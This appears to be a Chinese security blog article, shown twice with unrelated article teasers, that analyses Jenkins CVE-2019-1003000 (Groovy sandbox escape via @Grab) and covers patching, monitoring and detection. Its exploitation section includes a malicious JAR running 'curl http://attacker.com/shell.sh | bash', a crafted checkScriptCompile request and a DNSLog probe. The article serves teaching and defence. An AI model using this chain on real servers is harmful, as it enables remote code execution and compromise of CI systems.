Jenkins沙箱逃逸漏洞CVE-2019-1003000深度剖析与实战防御1. 漏洞背景与影响范围2019年初Jenkins官方发布了一则高危安全公告披露了Script Security和Pipeline插件中存在的一个严重漏洞。该漏洞允许具有Overall/Read权限的用户绕过Groovy沙箱保护在Jenkins主服务器上执行任意代码。漏洞涉及三个关键插件Pipeline: Declarative Plugin ≤1.3.4Pipeline: Groovy Plugin ≤2.61Script Security Plugin ≤1.49漏洞核心机制在于攻击者可以利用Groovy的AST转换注释如Grab在脚本编译阶段绕过安全沙箱检查。这种设计缺陷使得攻击者能够通过精心构造的Pipeline脚本实现远程代码执行(RCE)。重要提示即使启用了Jenkins的脚本安全沙箱此漏洞仍可被利用这使得它的危害性显著增加。2. 技术原理深度解析2.1 Groovy沙箱机制剖析Jenkins的Pipeline功能依赖于Groovy脚本执行为了安全考虑实现了沙箱环境来限制危险操作。沙箱通过以下方式工作白名单机制只允许特定的Groovy/Java方法和类脚本审批管理员需批准非白名单操作AST转换检查在编译阶段验证脚本结构// 正常沙箱限制下的Pipeline脚本示例 node { stage(Build) { sh make // 白名单允许的操作 } }2.2 AST转换注释的滥用漏洞的关键在于Groovy的注解处理器机制。Grab注解本用于方便地引入Maven依赖Grab(org.apache.commons:commons-lang3:3.9) import org.apache.commons.lang3.StringUtils攻击者可以构造恶意注解链禁用校验和检查GrabConfig(disableChecksumstrue)指定恶意仓库GrabResolver(nameevil, roothttp://attacker.com)加载恶意依赖Grab(groupevil, modulepayload, version1)2.3 漏洞触发流程完整的攻击链包含以下步骤攻击者提交包含恶意注解的Pipeline脚本Jenkins使用GroovyClassLoader解析脚本注解处理器从攻击者控制的仓库下载恶意JARJAR中的静态初始化块或特定类被自动执行实现远程代码执行3. 漏洞复现与攻击演示3.1 环境搭建建议推荐使用以下Docker环境进行测试git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git cd cve-2019-1003000-jenkins-rce-poc/sample-vuln ./run.sh # 启动漏洞环境环境默认配置Jenkins 2.138.1用户凭证user1/user1预置Jobmy-pipeline3.2 手工验证漏洞存在使用DNSLog进行无侵入验证GrabConfig(disableChecksumstrue) GrabResolver(nametest, roothttp://xxx.dnslog.cn) Grab(grouptest.sec, moduletest, version1) import Payload;观察DNSLog平台是否收到请求确认漏洞存在。3.3 完整攻击链构建步骤1准备恶意JAR// jkrce.java public class jkrce { public jkrce() { try { String cmd curl http://attacker.com/shell.sh | bash; Runtime.getRuntime().exec(cmd); } catch (Exception e) {} } }编译并打包javac jkrce.java mkdir -p META-INF/services/ echo jkrce META-INF/services/org.codehaus.groovy.plugins.Runners jar cvf payload.jar .步骤2托管恶意JAR将payload.jar放置在可公开访问的Web服务器上路径为http://attacker.com/repo/tools/jenkins/1/步骤3发送恶意请求GET /securityRealm/user/user1/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?valueGrabConfig(disableChecksumstrue)%0aGrabResolver(name%27payload%27,root%27http://attacker.com/repo/%27)%0aGrab(group%27tools%27,module%27jenkins%27,version%271%27)%0aimport%20jkrce; HTTP/1.1 Host: vulnerable-jenkins.com4. 防御方案与最佳实践4.1 紧急修复措施立即更新插件Pipeline: Declarative → 1.3.4.1Pipeline: Groovy → 2.61.1Script Security → 1.50临时缓解方案# 禁用相关端点 echo deny /securityRealm/user/*/descriptorByName/* $JENKINS_HOME/secrets/whitelist.conf4.2 安全加固建议权限控制矩阵角色建议权限风险操作开发者Job/Configure限制Pipeline脚本修改运维Overall/Read禁止赋予Admin权限管理员全权限定期审计Pipeline安全编码规范使用声明式Pipeline而非脚本式启用脚本审核properties([ pipelineTriggers([]), parameters([]), scriptApproval([ method java.lang.Runtime exec java.lang.String ]) ])限制共享库使用# 在Jenkins全局配置中设置 -Dorg.jenkinsci.plugins.workflow.libs.LibrariesPicker.filter^approved-.$4.3 持续监控策略日志监控关键端点/securityRealm/user/.*/descriptorByName/.*checkScriptCompile文件完整性检查# 监控$JENKINS_HOME/.groovy/grapes/下的异常JAR find $JENKINS_HOME -name *.jar -mtime -1 -ls网络出口过滤限制Jenkins服务器出站连接到已知Maven仓库5. 漏洞检测与响应5.1 自动化检测脚本使用以下Groovy脚本检查系统是否受影响import jenkins.model.* import org.jenkinsci.plugins.scriptsecurity.scripts.* def isVulnerable() { def plugins Jenkins.instance.pluginManager.plugins def declarative plugins.find { it.shortName pipeline-model-declarative } def groovy plugins.find { it.shortName workflow-cps } def security plugins.find { it.shortName script-security } return (declarative.version 1.3.4 || groovy.version 2.61 || security.version 1.49) } println Vulnerable to CVE-2019-1003000: ${isVulnerable()}5.2 事件响应流程确认入侵检查/var/log/jenkins/jenkins.log中的异常编译请求排查最近修改的Pipeline任务遏制措施# 立即停止服务 systemctl stop jenkins # 备份关键数据 tar czvf jenkins_backup_$(date %s).tar.gz $JENKINS_HOME恢复步骤从备份恢复$JENKINS_HOME/jobs/目录审查所有Pipeline脚本中的Grab使用重置所有用户凭证6. 架构层面的防御思考6.1 安全开发生命周期集成Pipeline代码审查使用GitHub Advanced Security或GitLab SAST扫描Groovy脚本实施Pull Request审核流程最小权限CI/CD设计graph LR A[开发者] --|提交代码| B[Git仓库] B --|触发| C[Jenkins Agent] C --|受限权限| D[构建环境] D --|只读访问| E[制品仓库]6.2 高级防护方案网络隔离策略将Jenkins master置于独立VLAN使用跳板机控制访问运行时防护# 使用SELinux限制Jenkins进程 setsebool -P jenkins_can_network_connect 0eBPF监控// 监控execve系统调用 SEC(tracepoint/syscalls/sys_enter_execve) int trace_execve(struct trace_event_raw_sys_enter* ctx) { char comm[TASK_COMM_LEN]; bpf_get_current_comm(comm, sizeof(comm)); if (memcmp(comm, java, 4) 0) { bpf_printk(Jenkins执行命令: %s, ctx-args[1]); } return 0; }在实际生产环境中我们曾遇到攻击者尝试利用此漏洞植入挖矿木马的情况。通过实施网络出口过滤和文件完整性监控成功在恶意载荷下载阶段阻断了攻击。这提醒我们多层防御体系在对抗此类漏洞时至关重要。
从Groovy沙箱逃逸到RCE:深入解析Jenkins CVE-2019-1003000漏洞原理与防御
发布时间:2026/5/28 22:30:17
Jenkins沙箱逃逸漏洞CVE-2019-1003000深度剖析与实战防御1. 漏洞背景与影响范围2019年初Jenkins官方发布了一则高危安全公告披露了Script Security和Pipeline插件中存在的一个严重漏洞。该漏洞允许具有Overall/Read权限的用户绕过Groovy沙箱保护在Jenkins主服务器上执行任意代码。漏洞涉及三个关键插件Pipeline: Declarative Plugin ≤1.3.4Pipeline: Groovy Plugin ≤2.61Script Security Plugin ≤1.49漏洞核心机制在于攻击者可以利用Groovy的AST转换注释如Grab在脚本编译阶段绕过安全沙箱检查。这种设计缺陷使得攻击者能够通过精心构造的Pipeline脚本实现远程代码执行(RCE)。重要提示即使启用了Jenkins的脚本安全沙箱此漏洞仍可被利用这使得它的危害性显著增加。2. 技术原理深度解析2.1 Groovy沙箱机制剖析Jenkins的Pipeline功能依赖于Groovy脚本执行为了安全考虑实现了沙箱环境来限制危险操作。沙箱通过以下方式工作白名单机制只允许特定的Groovy/Java方法和类脚本审批管理员需批准非白名单操作AST转换检查在编译阶段验证脚本结构// 正常沙箱限制下的Pipeline脚本示例 node { stage(Build) { sh make // 白名单允许的操作 } }2.2 AST转换注释的滥用漏洞的关键在于Groovy的注解处理器机制。Grab注解本用于方便地引入Maven依赖Grab(org.apache.commons:commons-lang3:3.9) import org.apache.commons.lang3.StringUtils攻击者可以构造恶意注解链禁用校验和检查GrabConfig(disableChecksumstrue)指定恶意仓库GrabResolver(nameevil, roothttp://attacker.com)加载恶意依赖Grab(groupevil, modulepayload, version1)2.3 漏洞触发流程完整的攻击链包含以下步骤攻击者提交包含恶意注解的Pipeline脚本Jenkins使用GroovyClassLoader解析脚本注解处理器从攻击者控制的仓库下载恶意JARJAR中的静态初始化块或特定类被自动执行实现远程代码执行3. 漏洞复现与攻击演示3.1 环境搭建建议推荐使用以下Docker环境进行测试git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git cd cve-2019-1003000-jenkins-rce-poc/sample-vuln ./run.sh # 启动漏洞环境环境默认配置Jenkins 2.138.1用户凭证user1/user1预置Jobmy-pipeline3.2 手工验证漏洞存在使用DNSLog进行无侵入验证GrabConfig(disableChecksumstrue) GrabResolver(nametest, roothttp://xxx.dnslog.cn) Grab(grouptest.sec, moduletest, version1) import Payload;观察DNSLog平台是否收到请求确认漏洞存在。3.3 完整攻击链构建步骤1准备恶意JAR// jkrce.java public class jkrce { public jkrce() { try { String cmd curl http://attacker.com/shell.sh | bash; Runtime.getRuntime().exec(cmd); } catch (Exception e) {} } }编译并打包javac jkrce.java mkdir -p META-INF/services/ echo jkrce META-INF/services/org.codehaus.groovy.plugins.Runners jar cvf payload.jar .步骤2托管恶意JAR将payload.jar放置在可公开访问的Web服务器上路径为http://attacker.com/repo/tools/jenkins/1/步骤3发送恶意请求GET /securityRealm/user/user1/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?valueGrabConfig(disableChecksumstrue)%0aGrabResolver(name%27payload%27,root%27http://attacker.com/repo/%27)%0aGrab(group%27tools%27,module%27jenkins%27,version%271%27)%0aimport%20jkrce; HTTP/1.1 Host: vulnerable-jenkins.com4. 防御方案与最佳实践4.1 紧急修复措施立即更新插件Pipeline: Declarative → 1.3.4.1Pipeline: Groovy → 2.61.1Script Security → 1.50临时缓解方案# 禁用相关端点 echo deny /securityRealm/user/*/descriptorByName/* $JENKINS_HOME/secrets/whitelist.conf4.2 安全加固建议权限控制矩阵角色建议权限风险操作开发者Job/Configure限制Pipeline脚本修改运维Overall/Read禁止赋予Admin权限管理员全权限定期审计Pipeline安全编码规范使用声明式Pipeline而非脚本式启用脚本审核properties([ pipelineTriggers([]), parameters([]), scriptApproval([ method java.lang.Runtime exec java.lang.String ]) ])限制共享库使用# 在Jenkins全局配置中设置 -Dorg.jenkinsci.plugins.workflow.libs.LibrariesPicker.filter^approved-.$4.3 持续监控策略日志监控关键端点/securityRealm/user/.*/descriptorByName/.*checkScriptCompile文件完整性检查# 监控$JENKINS_HOME/.groovy/grapes/下的异常JAR find $JENKINS_HOME -name *.jar -mtime -1 -ls网络出口过滤限制Jenkins服务器出站连接到已知Maven仓库5. 漏洞检测与响应5.1 自动化检测脚本使用以下Groovy脚本检查系统是否受影响import jenkins.model.* import org.jenkinsci.plugins.scriptsecurity.scripts.* def isVulnerable() { def plugins Jenkins.instance.pluginManager.plugins def declarative plugins.find { it.shortName pipeline-model-declarative } def groovy plugins.find { it.shortName workflow-cps } def security plugins.find { it.shortName script-security } return (declarative.version 1.3.4 || groovy.version 2.61 || security.version 1.49) } println Vulnerable to CVE-2019-1003000: ${isVulnerable()}5.2 事件响应流程确认入侵检查/var/log/jenkins/jenkins.log中的异常编译请求排查最近修改的Pipeline任务遏制措施# 立即停止服务 systemctl stop jenkins # 备份关键数据 tar czvf jenkins_backup_$(date %s).tar.gz $JENKINS_HOME恢复步骤从备份恢复$JENKINS_HOME/jobs/目录审查所有Pipeline脚本中的Grab使用重置所有用户凭证6. 架构层面的防御思考6.1 安全开发生命周期集成Pipeline代码审查使用GitHub Advanced Security或GitLab SAST扫描Groovy脚本实施Pull Request审核流程最小权限CI/CD设计graph LR A[开发者] --|提交代码| B[Git仓库] B --|触发| C[Jenkins Agent] C --|受限权限| D[构建环境] D --|只读访问| E[制品仓库]6.2 高级防护方案网络隔离策略将Jenkins master置于独立VLAN使用跳板机控制访问运行时防护# 使用SELinux限制Jenkins进程 setsebool -P jenkins_can_network_connect 0eBPF监控// 监控execve系统调用 SEC(tracepoint/syscalls/sys_enter_execve) int trace_execve(struct trace_event_raw_sys_enter* ctx) { char comm[TASK_COMM_LEN]; bpf_get_current_comm(comm, sizeof(comm)); if (memcmp(comm, java, 4) 0) { bpf_printk(Jenkins执行命令: %s, ctx-args[1]); } return 0; }在实际生产环境中我们曾遇到攻击者尝试利用此漏洞植入挖矿木马的情况。通过实施网络出口过滤和文件完整性监控成功在恶意载荷下载阶段阻断了攻击。这提醒我们多层防御体系在对抗此类漏洞时至关重要。
相关文章
MZmine 3质谱数据分析实战手册:从数据导入到生物学洞察的完整指南
MZmine 3质谱数据分析实战手册:从数据导入到生物学洞察的完整指南 【免费下载链接】mzmine3 MZmine 3 source code repository 项目地址: https://gitcode.com/gh_mirrors/mz/mzmine3 您是否曾面对海量质谱数据感到无从下手?是否在处理复杂样本时…
从源码编译到放弃?DataEase源码部署踩坑实录(Node.js版本冲突解决指南)
从源码编译到放弃?DataEase源码部署踩坑实录(Node.js版本冲突解决指南) 当你满怀期待地打开DataEase的官方文档,准备通过源码部署来深度定制这个开源数据可视化平台时,可能没想到会在Node.js版本这个看似简单的问题上…
VNPY实战篇 构建A股本地数据仓库:从腾讯财经API到SQLite的自动化管道
1. 为什么需要本地A股数据仓库 做量化交易的朋友都知道,数据是策略研发的基石。很多新手刚开始都会直接调用在线API获取实时数据,但这种方式有几个致命缺陷:一是网络请求不稳定,二是历史数据获取效率低,三是无法进行复…
基于Arduino的智能冰箱门未关提醒系统DIY全攻略
1. 项目概述与核心价值家里冰箱门没关严,导致冷气外泄、食物变质,甚至压缩机长时间工作耗电,这事儿估计不少朋友都遇到过。我自己就因为这事儿被家里人念叨过好几回,有时候是拿完东西顺手一带,门没卡到位;有…
2026论文双降终极榜单:10款降AI率平台,智能改写快速定稿成文
毕业季的论文战场,重复率与 AIGC 率已成两大 "生死关"。知网、维普不断升级检测算法,AI 写作痕迹一查一个准,单纯降重已不够,必须双率齐降。本文实测 2026 年主流 10 款学术工具,从千笔AI领衔,覆…
Python新手如何快速接入Taotoken调用大模型API完成第一个对话
🚀 告别海外账号与网络限制!稳定直连全球优质大模型,限时半价接入中。 👉 点击领取海量免费额度 Python新手如何快速接入Taotoken调用大模型API完成第一个对话 对于刚开始接触Python和大模型API的开发者来说,直接对接…
告别官方下载器!用UUPdump手动下载Win11最新Dev/预览版ISO全攻略
深度解析UUPdump:Windows 11预览版ISO定制化下载实战手册 对于热衷于尝鲜最新Windows 11功能的科技爱好者来说,官方渠道的更新节奏往往难以满足需求。UUPdump作为非官方的Windows更新聚合平台,提供了直接获取微软服务器原始文件的途径&#x…
金融监管报表自动报送如何确保准确性?深度解析2026年企业级Agent落地实战
在2026年的数字化转型深水区,金融机构面临的监管环境日益严峻。从反洗钱监测到资本充足率报送,数据的准确性与合规性已成为金融企业的生命线。传统的自动化手段在面对海量、碎片化且高频更迭的监管要求时,往往显得捉襟见肘。 随着AI Agent技术…
DeepSeek-R1模型腾讯云一键部署包泄露:3分钟完成API服务上线,附限时限领离线镜像链接
更多请点击: https://kaifayun.com 第一章:DeepSeek-R1模型腾讯云一键部署包泄露事件全景解析 2024年7月,安全研究人员在腾讯云COS公开存储桶中发现一个未授权访问的部署包( deepseek-r1-tencent-deploy-v1.3.0.tar.gz࿰…
大模型核心加速器:KV Cache 如何将 O(n²) 计算复杂度降至 O(n)?
KV Cache 是大模型自回归生成任务的关键优化技术,通过“空间换时间”策略缓存历史 Key 和 Value 向量,将推理复杂度从 O(n) 降至 O(n)。文章阐述了语义缓存与前缀精确匹配两种核心范式,深入分析了 KV Cache 的技术底层原理、工程化应用及规模…
物流系统如何打通信息孤岛?哲盟软件系统:一键打通内外部数据壁垒
在数字化转型加速的今天,物流企业面临的最大痛点之一就是信息孤岛——ERP、电商平台、智能硬件、OMS/TMS/WMS等系统各自为政,数据无法自由流转,导致人工操作繁琐、效率低下、出错率高。特别是在跨境物流领域,亚马逊、Shopee、TikT…
Windows Defender终极恢复指南:5种强力方法解决禁用问题
Windows Defender终极恢复指南:5种强力方法解决禁用问题 【免费下载链接】no-defender A slightly more fun way to disable windows defender firewall. (through the WSC api) 项目地址: https://gitcode.com/GitHub_Trending/no/no-defender 当你的Windo…
施工现场安全事故预警准确率达94.6%?——解密某央企AI Agent边缘计算部署架构与3个月落地实录
更多请点击: https://codechina.net 第一章:施工现场安全事故预警准确率达94.6%?——解密某央企AI Agent边缘计算部署架构与3个月落地实录 在华北某大型地铁盾构施工现场,一套轻量化AI Agent系统于2024年Q2完成全栈部署ÿ…
附录 B:术语表
本术语表面向“从 MM 到 HMM”专栏阅读过程中的快速查阅。它不是内核 API 手册,而是把文章中反复出现的概念放到同一张地图上:先给出直观含义,再说明它在 Linux MM/HMM 语境里的作用。建议阅读方式: 初读专栏时,把它当…
Midjourney渐变美学的神经渲染原理(附RGB-HSV-LCH三空间渐变映射对照表·行业首曝)
更多请点击: https://kaifayun.com 第一章:Midjourney渐变美学的神经渲染原理(附RGB-HSV-LCH三空间渐变映射对照表行业首曝) Midjourney 的渐变美学并非传统插值实现,而是由其隐式神经渲染器(Implicit Neu…
MPC-BE:基于DirectShow架构的专业级开源媒体播放解决方案
MPC-BE:基于DirectShow架构的专业级开源媒体播放解决方案 【免费下载链接】MPC-BE MPC-BE – универсальный проигрыватель аудио и видеофайлов для операционной системы Windows. 项目地址:…
如何快速计算3D模型体积和重量:STL-Volume-Model-Calculator终极指南
如何快速计算3D模型体积和重量:STL-Volume-Model-Calculator终极指南 【免费下载链接】STL-Volume-Model-Calculator STL Volume Model Calculator Python 项目地址: https://gitcode.com/gh_mirrors/st/STL-Volume-Model-Calculator 你是否曾经为3D打印项目…
通过Taotoken CLI工具一键配置团队开发环境与模型密钥
通过Taotoken CLI工具一键配置团队开发环境与模型密钥 1. CLI工具安装与基本使用 Taotoken提供的CLI工具可通过npm全局安装或直接使用npx运行。对于需要频繁使用CLI的团队,推荐全局安装: npm install -g taotoken/taotoken对于临时使用或项目级配置&a…